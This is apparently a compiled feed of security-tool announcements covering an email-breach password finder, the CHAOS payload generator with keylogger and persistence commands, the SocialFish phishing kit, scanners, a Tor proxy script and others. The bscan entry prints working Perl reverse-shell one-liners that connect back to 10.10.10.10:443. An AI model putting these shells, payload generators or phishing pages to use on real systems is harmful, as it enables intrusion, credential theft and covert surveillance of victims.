pwnedOrNot v1.1.7 – OSINT Tool To Find Passwords For Compromised Email Addresses

pwnedOrNot uses haveibeenpwned v2 api to test email accounts and tries to find the password in Pastebin Dumps.Featureshaveibeenpwned offers a lot of information about the compromised email, some useful information is displayed by this script:Name of BreachDomain NameDate of BreachFabrication statusVerification StatusRetirement statusSpam StatusAnd with all this information pwnedOrNot can easily find passwords for compromised emails if the dump is accessible and it contains the passwordTested onKali Linux 18.2Ubuntu 18.04Kali NethunterTermuxInstallationUbuntu / Kali Linux / Nethunter / Termuxchmod 777 install.sh./install.shUsagepython3 pwnedornot.py -husage: pwnedornot.py [-h] [-e EMAIL] [-f FILE] [-d DOMAIN] [-n] [-l] [-c CHECK]optional arguments: -h, –help show this help message and exit -e EMAIL, –email EMAIL Email Address You Want to Test -f FILE, –file FILE Load a File with Multiple Email Addresses -d DOMAIN, –domain DOMAIN Filter Results by Domain Name -n, –nodumps Only Check Breach Info and Skip Password Dumps -l, –list Get List of all pwned Domains -c CHECK, –check CHECK Check if your Domain is pwned# Examples# Check Single Emailpython3 pwnedornot.py -e #ORpython3 pwnedornot.py –email <email># Check Multiple Emails from Filepython3 pwnedornot.py -f <file name># ORpython3 pwnedornot.py –file <file name># Filter Result for a Domain Name [Ex : adobe.com]python3 pwnedornot.py -e <email> -d <domain name>#ORpython3 pwnedornot.py -f <file name> –domain <domain name># Get only Breach Info, Skip Password Dumpspython3 pwnedornot.py -e <email> -n#ORpython3 pwnedornot.py -f <file name> –nodumps# Get List of all Breached Domainspython3 pwnedornot.py -l#ORpython3 pwnedornot.py –list# Check if a Domain is Pwnedpython3 pwnedornot.py -c <domain name>#ORpython3 pwnedornot.py –check <domain name>DemoDownload pwnedOrNot

Link: http://feedproxy.google.com/~r/PentestTools/~3/zMsIKFBaGtY/pwnedornot-v117-osint-tool-to-find.html

CHAOS Framework v2.0 – Generate Payloads And Control Remote Windows Systems

CHAOS is a PoC that allow generate payloads and control remote operating systems.Features Feature Windows Mac Linux Reverse Shell X X X Download File X X X Upload File X X X Screenshot X X X Keylogger X Persistence X Open URL X X X Get OS Info X X X Fork Bomb X X X Run Hidden X Tested OnKali Linux – ROLLING EDITIONHow to Install# Install dependencies$ sudo apt install golang git -y# Get this repository$ go get github.com/tiagorlampert/CHAOS# Get external golang dependencies (ARE REQUIRED GET ALL DEPENDENCIES)$ go get github.com/kbinani/screenshot$ go get github.com/lxn/win$ go get github.com/matishsiao/goInfo$ go get golang.org/x/sys/windows# Maybe you will see the message “package github.com/lxn/win: build constraints exclude all Go files".# It’s occurs because the libraries are to windows systems, but it necessary to build the payload.# Go into the repository$ cd ~/go/src/github.com/tiagorlampert/CHAOS# Run$ go run main.goHow to Use Command On HOST does… generate Generate a payload (e.g. generate lhost=192.168.0.100 lport=8080 fname=chaos –windows) lhost= Specify a ip for connection lport= Specify a port for connection fname= Specify a filename to output –windows Target Windows –macos Target Mac OS –linux Target Linux listen Listen for a new connection (e.g. listen lport=8080) serve Serve files exit Quit this program Command On TARGET does… download File Download upload File Upload screenshot Take a Screenshot keylogger_start Start Keylogger session keylogger_show Show Keylogger session logs persistence_enable Install at Startup persistence_disable Remove from Startup getos Get OS name lockscreen Lock the OS screen openurl Open the URL informed bomb Run Fork Bomb clear Clear the Screen back Close connection but keep running on target exit Close connection and exit on target VideoFAQWhy does Keylogger capture all uppercase letters?All the letters obtained using the keylogger are uppercase letters. It is a known issue, in case anyone knows how to fix the Keylogger function using golang, please contact me or open an issue.Why are necessary get and install external libraries?To implement the screenshot function i used a third-party library, you can check it in https://github.com/kbinani/screenshot and https://github.com/lxn/win. You must download and install it to generate the payload.Contacttiagorlampert@gmail.comDownload CHAOS

Link: http://www.kitploit.com/2019/04/chaos-framework-v20-generate-payloads.html

SocialFish v2 – Educational Phishing Tool & Information Collector

Ultimate phishing tool with Ngrok integrated.Are you looking for SF’s mobile controller? UndeadSec/SocialFishMobilePREREQUISITESPython 2.7Wget from PythonPHPTESTED ONKali Linux – ROLLING EDITIONCLONEgit clone https://github.com/UndeadSec/SocialFish.gitRUNNINGcd SocialFishsudo pip install -r requirements.txtpython SocialFish.pyAVAILABLE PAGES+ Facebook:Traditional Facebook login page.Advanced login with Facebook.+ Google:Traditional Google login page.Advanced login with Facebook.+ LinkedIN:Traditional LinkedIN login page.+ Github:Traditional Github login page.+ Stackoverflow:Traditional Stackoverflow login page.+ WordPress:Similar WordPress login page.VIDEODownload SocialFish

Link: http://feedproxy.google.com/~r/PentestTools/~3/UIciopFruGI/socialfish-v2-educational-phishing-tool.html

Cat-Nip – Automated Basic Pentest Tool (Designed For Kali Linux)

Cat-Nip Automated Basic Pentest Toolthis tool will make your basic pentesting task like Information Gathering, Auditing, And Reporting so this tool will do every task fully automatic.Usage GuideDownload / Clone Cat-Nip~# git clone https://github.com/baguswiratmaadi/catnipGo Inside Cat-Nip Dir~# cd catnipGive Permission To Cat-Nip~# chmod 777 catnip.shRun Cat-Nip~# ./catnip.shChangelog1.0 First ReleasePentest Tools Auto Executed With Cat-NipWhois LookupDNSmapNmapDmitryTheharvesterLoad Balancing DetectorSSLyzeAutomaterUa TesterGobusterGrabberParseroUniscanAnd More Tool SoonScreenshotthis is preview Cat-NipTools PreviewOutput ResultReport In HTMLDisclaimerDo not scan government and private IT objects without legal permission.Do At Your Own RiskDownload Catnip

Link: http://feedproxy.google.com/~r/PentestTools/~3/8By2_tKKSAQ/cat-nip-automated-basic-pentest-tool.html

UPDATE: Kali Linux 2019.1 Release!

PenTestIT RSS Feed
Kali Linux 2019.1 is the latest Kali Linux release. This is the first 2019 release, which comes after Kali Linux 2018.4, that was made available in the month of October. This new release includes all patches, fixes, updates, and improvements since the last release – Kali Linux 2018.3, including a shiny new Linux kernel versionRead more about UPDATE: Kali Linux 2019.1 Release!
The post UPDATE: Kali Linux 2019.1 Release! appeared first on PenTestIT.

Link: http://pentestit.com/update-kali-linux-2019-1-release/

Bscan – An Asynchronous Target Enumeration Tool

Synopsisbscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.Installationbscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.Download the latest packaged version from PyPI:pip install bscanOr get the bleeding-edge version from version control:pip install https://github.com/welchbj/bscan/archive/master.tar.gzBasic Usagebscan has a wide variety of configuration options which can be used to tune scans to your needs. Here’s a quick example:$ bscan \> –max-concurrency 3 \> –patterns [Mm]icrosoft \> –status-interval 10 \> –verbose-status \> scanme.nmap.orgWhat’s going on here?–max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time–patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output–status-interval 10 tells bscan to print runtime status updates every 10 seconds–verbose-status means that each of these status updates will print details of all currently-running scan subprocessesscanme.nmap.org is the host upon which we want to enumeratebscan also relies on some additional configuration files. The default files can be found in the bscan/configuation directory and serve the following purposes:patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan outputrequired-programs.txt specifies the installed programs that bscan plans on usingport-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan outputservice-scans.toml defines the scans be run on the target(s) on a per-service basisDetailed OptionsHere’s what you should see when running bscan –help:usage: bscan [OPTIONS] targets _| |__ ___ ___ __ _ _ __| ‘_ \/ __|/ __/ _` | ‘_ \| |_) \__ \ (__ (_| | | | ||_.__/|___/\___\__,_|_| |_|an asynchronous service enumeration toolpositional arguments: targets the targets and/or networks on which to perform enumerationoptional arguments: -h, –help show this help message and exit –brute-pass-list F filename of password list to use for brute-forcing –brute-user-list F filename of user list to use for brute-forcing –cmd-print-width I the maximum integer number of characters allowed when printing the command used to spawn a running subprocess (defaults to 80) –config-dir D the base directory from which to load the configuration files; required configuration files missing from this directory will instead be loaded from the default files shipped with this program –hard force overwrite of existing directories –max-concurrency I maximum integer number of subprocesses permitted to be running concurrently (defaults to 20) –no-program-check disable checking the presence of required system programs –no-file-check disable checking the presence of files such as configured wordlists –no-service-scans disable running scans on discovered services –output-dir D the base directory in which to write output files –patterns [ [ …]] regex patterns to highlight in output text –ping-sweep enable ping sweep filtering of hosts from a network range before running more intensive scans –quick-only whether to only run the quick scan (and not include the thorough scan over all ports) –qs-method S the method for performing the initial TCP port scan; must correspond to a configured port scan –status-interval I integer number of seconds to pause in between printing status updates; a non-positive value disables updates (defaults to 30) –ts-method S the method for performing the thorough TCP port scan; must correspond to a configured port scan –udp whether to run UDP scans –udp-method S the method for performing the UDP port scan; must correspond to a configured port scan –verbose-status whether to print verbose runtime status updates, based on frequency specified by `–status-interval` flag –version program version –web-word-list F the wordlist to use for scansCompanion ToolsThe main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here’s a simple example:$ bscan-wordlists –find “*win*"/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt/usr/share/wordlists/metasploit/sensitive_files_win.txt/usr/share/seclists/Passwords/common-passwords-win.txtTry bscan-wordlists –help to explore other options.bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here’s a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:$ bscan-shells –port 443 10.10.10.10 | grep -i -A1 perlperl for windowsperl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’perl with /bin/shperl -e ‘use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’perl without /bin/shperl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells –help to explore other options.DevelopmentStart by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):# setup the environmentmkvirtualenv -p $(which python3) bscan-devworkon bscan-dev# get the depspip install -r dev-requirements.txtLint and type-check the project (these are run on Travis, too):flake8 . && mypy bscanWhen it’s time to package a new release:# build source and wheel distributionspython setup.py bdist_wheel sdist# run post-build checkstwine check dist/*# upload to PyPItwine upload dist/*Download Bscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/nmAEkhGVeYk/bscan-asynchronous-target-enumeration.html

Tool-X – A Kali Linux Hacking Tool Installer

What is Tool-X ?Tool-X is a kali linux hacking Tool installer. Tool-X is Developed By Rajkumar Dusad. with the help of Tool-X you can install best hacking tools in Rooted or Non Rooted Android devices. In the Tool-X there are almost 240 hacking tools available for termux app and GNURoot Debian terminal. you can install any tool by single click. Tool-X is Specially made for Termux and GNURoot Debian Terminal. Now Tool-X is available for Ubuntu.How to use ?Type 0 : To install all tools.Type 1 : to sow all available tools and type the number of a tool which you want to install.Type 2 : to show tools category.Type 3 : for install operating system in termuxType 4 : if you want to update Tool-X.Type 5 : if you know About us.Type x : for exit.Tool-X is available forAndroidUbuntuHow to Install in termux ?Open the termux app and type following commands. apt update pkg install git git clone https://github.com/Rajkumrdusad/Tool-X.git cd Tool-X chmod +x install.aex sh install.aex if not work than type ./install.aex Now Tool-X is installed successfully. To run Tool-X Type Tool-XNow type Tool-X from anywhare in your terminal to open Tool-X.How to Install in GNURoot Debian Terminal ?Open the GNURoot Debian app and type following commands. apt update apt install git cd && git clone https://github.com/Rajkumrdusad/Tool-X.git cd Tool-X chmod +x install.aex sh install.aex if not work than type ./install.aex Now Tool-X is installed successfully. To run Tool-X Type Tool-XNow type Tool-X from anywhare in your terminal to open Tool-X. But use this tool only for legal purpose.How to install in Ubuntu ? sudo apt-get Update sudo apt-get install git sudo git clone https://github.com/Rajkumrdusad/Tool-X.git cd Tool-X chmod +x install.aex sudo sh install.aex OR ./install.aex Now Tool-X is installed successfully. To run Tool-X Type Tool-XNow type Tool-X from anywhare in your terminal to open Tool-X. But use this tool only for legal purpose.Download Tool-X

Link: http://feedproxy.google.com/~r/PentestTools/~3/JqzGZm7j4JQ/tool-x-kali-linux-hacking-tool-installer.html

Kalitorify – Transparent Proxy Through Tor For Kali Linux OS

kalitorify is a shell script for Kali Linux which use iptables settings for transparent proxy through Tor, the program also allows you to perform various checks like checking the external ip, or if Tor has been configured correctly.What is Transparent Proxy?Also known as an intercepting proxy, inline proxy, or forced proxy, a transparent proxy intercepts normal communication at the network layer without requiring any special client configuration. Clients need not be aware of the existence of the proxy. A transparent proxy is normally located between the client and the Internet, with the proxy performing some of the functions of a gateway or router.Strictly speaking, with kalitorify you can redirect all traffic of your Kali Linux operating system through Tor.In the Tor project wiki you find an explanation of what is the “transparent proxy through tor" and related settings.Recommendationskalitorify is produced independently from the Tor anonimity software and carries no guarantee from the Tor Project about quality, suitability or anything else, please read these documents to know how to use the Tor network safely:Tor General FAQWhonix Do Not recommendationsInstallInstall dependencies:sudo apt update && sudo apt full-upgrade -ysudo apt install tor -yInstall kalitorify and reboot:git clone https://github.com/brainfucksec/kalitorifycd kalitorify/sudo make installsudo rebootUsagekalitorify [option]Options-t, –torstart transparent proxy through tor-c, –clearnetreset iptables and return to clearnet navigation-s, –statuscheck status of program and services-i, –ipinfoshow public IP-r, –restartrestart tor service and change IPDownload Kalitorify

Link: http://feedproxy.google.com/~r/PentestTools/~3/iaWI5yDUmTg/kalitorify-transparent-proxy-through.html

Defend against Brute Force Attack with Fail2ban

Daily we hear some news related to cybercrime just, like, some malicious users or bots has successfully defaced some publicly accessible website or some services. As we always try to explain through our articles, how such types of activities are possible when system is weak configured or misconfigured. Therefore, it is important to build some… Continue reading →
The post Defend against Brute Force Attack with Fail2ban appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/defend-against-brute-force-attack-with-fail2ban/

Deep Explorer – Tool Which Purpose Is The Search Of Hidden Services In Tor Network, Using Ahmia Browser And Crawling The Links Obtained

Dependencies pip3 install -r requirements.txtalso you should have Tor installedUsagepython3 deepexplorer.py STRING_TO_SEARCH NUMBER_OF_RESULTS TYPE_OF_CRAWLExamples:python3 deepexplorer.py “legal thing" 40 default legal (will crawl if results obtained in browser do not reach 40, also the script will show links which have "legal" string in html [like intext dork in google])python3 deepexplorer.py "ilegal thing" 30 all dni(will crawl every link obtained in browser [ultil reachs 30], also the script will show links which have "dni" string in html [like intext dork in google])python3 deepexplorer.py "legal thing" 30 none (do not crawl, only obtain links from browser)AboutDeep Explorer is a tool designed to search (any) thing in a few secondsAny idea, failure etc please report to telegram: blueudpresults.txt contains results obtaioned in previus searchTested in ParrotOS and Kali Linux 2.0Type of ErrorsError importing… -> You should try manual pip install packageError connecting to server -> Cant connect to ahmia browser If deep explorer can not execute service …, do it manually, deep explorer checks the tor instance at the beginning so it will skip that partContactName: Eduardo Pérez-MalumbresTelegram: @blueudpTwitter: https://twitter.com/blueudpDownload Deep-Explorer

Link: http://feedproxy.google.com/~r/PentestTools/~3/Uky3GEJ7r8k/deep-explorer-tool-which-purpose-is.html